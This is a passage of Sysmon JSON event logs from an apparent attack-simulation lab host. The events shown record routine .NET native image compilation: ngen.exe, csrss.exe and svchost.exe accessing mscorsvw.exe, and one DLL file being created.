05:59:20.481","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04B8-5F25-0000-00105D2D1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7423,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:20.481\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04B8-5F25-0000-00105D2D1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:20.481","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04B8-5F25-0000-00105D2D1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7424,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:20.496\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04B8-5F25-0000-00105D2D1000}\r\nTargetProcessId: 4372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:20.496","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04B8-5F25-0000-00105D2D1000}","TargetProcessId":"4372","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7425,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:20.590\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010DFF50C00}\r\nTargetProcessId: 3024\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:20.590","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010DFF50C00}","TargetProcessId":"3024","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7426,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:20.590\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010DFF50C00}\r\nTargetProcessId: 3024\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:20.590","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010DFF50C00}","TargetProcessId":"3024","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7427,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:20.590\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010DFF50C00}\r\nTargetProcessId: 3024\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:20.590","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010DFF50C00}","TargetProcessId":"3024","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7428,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:21.356\r\nProcessGuid: {A837DB8D-04B8-5F25-0000-001038311000}\r\nProcessId: 3024\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bd0-0\\System.Data.OracleClient.dll\r\nCreationUtcTime: 2020-08-01 05:59:21.356","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:21.356","ProcessGuid":"{A837DB8D-04B8-5F25-0000-001038311000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bd0-0\\System.Data.OracleClient.dll","CreationUtcTime":"2020-08-01 05:59:21.356","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7429,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:21.403\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A2-5F25-0000-001038B20F00}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:21.403","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A2-5F25-0000-001038B20F00}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7430,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:21.403\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A2-5F25-0000-001038B20F00}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:21.403","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A2-5F25-0000-001038B20F00}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7431,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:21.418\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04B9-5F25-0000-001059351000}\r\nTargetProcessId: 2764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 